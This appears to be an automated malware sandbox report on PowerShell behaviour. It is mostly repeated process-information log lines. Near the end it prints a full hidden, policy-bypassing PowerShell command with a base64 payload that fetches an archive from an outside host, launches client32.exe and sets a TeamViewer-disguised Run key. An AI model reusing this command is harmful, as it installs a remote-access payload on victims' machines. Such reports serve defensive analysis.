Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9761Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9039Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 9039 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
